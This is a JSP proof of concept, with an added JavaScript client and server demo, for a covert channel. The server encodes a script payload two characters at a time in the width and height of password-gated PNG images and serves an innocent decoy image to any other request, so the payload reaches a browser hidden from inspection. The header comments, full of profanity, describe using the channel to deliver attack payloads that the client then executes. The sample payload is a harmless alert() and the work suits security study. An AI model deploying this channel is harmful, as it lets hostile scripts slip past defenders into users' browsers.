<%
/**
 *
 * Arshan Dabirsiaghi (arshan.dabirsiaghi@gmail.com)
 * http://i8jesus.com
 *
 * Here's the protocol. This could be done more easily with a stateful session, but this is
 * way cooler and it lets us control transmission ordering, which would otherwise be an issue
 * with the browser's concurrent image requests: every request names its own index, so the
 * client reassembles by index no matter which order the images come back in. This is how
 * Chef Gordon Ramsay would do it. In his honor, I will litter the source code with swear words.
 *
 * 1) Phase I: Start the fucking transaction, client figures out payload length
 *    - piece of shit browser client makes a request with i=arshan and no j parameter
 *    - in the real world, a malicious fucking server could hide its purpose with port
 *      knocking or some other passive authentication, shitface.
 *    - server responds with an image with height = length(fucking payload). As with all the
 *      messages in this protocol, the contents of the image are as irrelevant as your South
 *      Beach recipes. The real "messages" are the dimensions. The first message is just a bit
 *      extra fucking special because it only needs to send 1 dimension, the length of the payload.
 *
 * 2) Phase II: Transmitting payload
 *    - the server sits back and watches
 *    - client makes a request with i=arshan (or whatever PASSWORD is set to) and j=index
 *    - server returns an img whose width and height are the next two characters of the
 *      payload: width = payload[index], height = payload[index+1] (height stays 1 for the
 *      last character of an odd-length payload). The client therefore steps index by 2.
 *    - client knows the payload length from Phase I, so it knows when to stop
 *
 * 3) Phase III: Client has payload, fucks something up with it
 *    - attack client now has full payload
 *
 * Caveats: a character whose code is 0 would give a zero-sized image, and BufferedImage
 * throws on that, so keep NUL out of PAYLOAD. Any request without the right PASSWORD, or
 * with a j that is out of range or not a number, gets an innocent 1x1 image.
 */
%>
<%@ page language="java" contentType="image/png" trimDirectiveWhitespaces="true" %>
<%@ page import="java.io.*" %>
<%@ page import="java.awt.*" %>
<%@ page import="java.awt.image.*" %>
<%@ page import="javax.imageio.ImageIO" %>
<%
    final String PAYLOAD = "alert('arshanismyhero')";
    final String PASSWORD = "arshan";
%>
<%
    int width = 1;
    int height = 1;

    String i = request.getParameter("i");
    String j = request.getParameter("j");

    if ( PASSWORD.equals(i) && j == null ) {
        // phase 1: the only thing we say is how long the payload is
        height = PAYLOAD.length();
    } else if ( PASSWORD.equals(i) ) {
        // phase 2: hand out two characters per image
        int index = -1;
        try {
            index = Integer.parseInt(j);
        } catch (NumberFormatException e) {
            // garbage j: fall through and serve the 1x1 decoy instead of a stack trace
        }
        if ( index >= 0 && index < PAYLOAD.length() ) {
            // valid payload request: width = this char, height = the next one (if any)
            width = (int)PAYLOAD.charAt(index);
            if ( index+1 != PAYLOAD.length() ) {
                height = (int)PAYLOAD.charAt(index+1);
            }
        }
    }

    BufferedImage buffer = new BufferedImage(width,height,BufferedImage.TYPE_INT_RGB);

    /* make the image all black to verify during testing */
    for(int x=0;x<width;x++) {
        for(int y=0;y<height;y++) {
            buffer.setRGB(x, y, 0x000000);
        }
    }

    /* The original file is cut off at the start of the loop above; what follows is an
       assumed completion: encode the image as PNG straight onto the response. Clearing
       the JSP writer and pushing a body keeps it from fighting with the raw output stream
       (the contentType and trimDirectiveWhitespaces attributes above serve the same end). */
    ImageIO.write(buffer, "png", response.getOutputStream());
    out.clear();
    out = pageContext.pushBody();
%>
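Added example, not part of Arshan's JSP: both ends of the dimension channel written in JavaScript so the exchange described in the header comment can be stepped through offline. `serverDims` mirrors the JSP's i/j decision tree (a non-numeric j yields the 1x1 decoy here); `receivePayload` is the logic a browser page would run, with `dimsFor(i, j)` standing in for "set an Image src and read naturalWidth/naturalHeight on load". The client deliberately requests the indices in reverse to show that reassembly depends on the index in the URL, not on arrival order. Function names, the sample payload and the password are constructed for this demo.

```javascript
// Added example, not from the original JSP: both sides of the
// image-dimension channel, runnable offline (Node or browser console).
// Names, the sample payload and the password are constructed for this demo.

// Server side: same decision tree as the JSP.  j === null means the request
// carried no j parameter (phase 1).  Anything unexpected gets a 1x1 decoy.
function serverDims(payload, password, i, j) {
  let width = 1;
  let height = 1;
  if (i !== password) {
    return { width, height };
  }
  if (j === null) {
    // Phase I: only the height carries information, the payload length.
    height = payload.length;
    return { width, height };
  }
  // Phase II: width = payload[index], height = payload[index + 1].
  // Non-numeric j becomes NaN and falls through to the decoy.
  const index = Number.parseInt(j, 10);
  if (Number.isInteger(index) && index >= 0 && index < payload.length) {
    width = payload.charCodeAt(index);
    if (index + 1 !== payload.length) {
      height = payload.charCodeAt(index + 1);
    }
  }
  return { width, height };
}

// Client side.  dimsFor(i, j) stands in for "point an <img> at the JSP and
// read naturalWidth/naturalHeight once it loads".  Each phase-II image
// carries two characters, so j advances by 2.  The indices are requested
// in reverse order on purpose: because every request names its own index,
// the payload is reassembled correctly whatever order the images arrive in.
function receivePayload(dimsFor, password) {
  const length = dimsFor(password, null).height;   // Phase I
  const chars = new Array(length);
  const indices = [];
  for (let j = 0; j < length; j += 2) indices.push(j);
  indices.reverse();
  for (const j of indices) {                         // Phase II
    const { width, height } = dimsFor(password, String(j));
    chars[j] = String.fromCharCode(width);
    if (j + 1 < length) {
      // For an odd-length payload the last image's height is a dummy 1.
      chars[j + 1] = String.fromCharCode(height);
    }
  }
  return chars.join('');
}

// Constructed sample values matching the JSP's defaults.
const PAYLOAD = "alert('arshanismyhero')";
const PASSWORD = 'arshan';

// Wire client to server in-process and run the whole exchange.
function demo() {
  const dimsFor = (i, j) => serverDims(PAYLOAD, PASSWORD, i, j);
  return receivePayload(dimsFor, PASSWORD);
}
```

In a real page `dimsFor` becomes `new Image()` with `img.src = '/covert.jsp?i=' + PASSWORD + '&j=' + j` (path assumed), and the width/height read moves into `img.onload` where `naturalWidth` and `naturalHeight` are available; that makes the Phase II loop asynchronous and the images may complete in any order, which is exactly why the index travels in the URL.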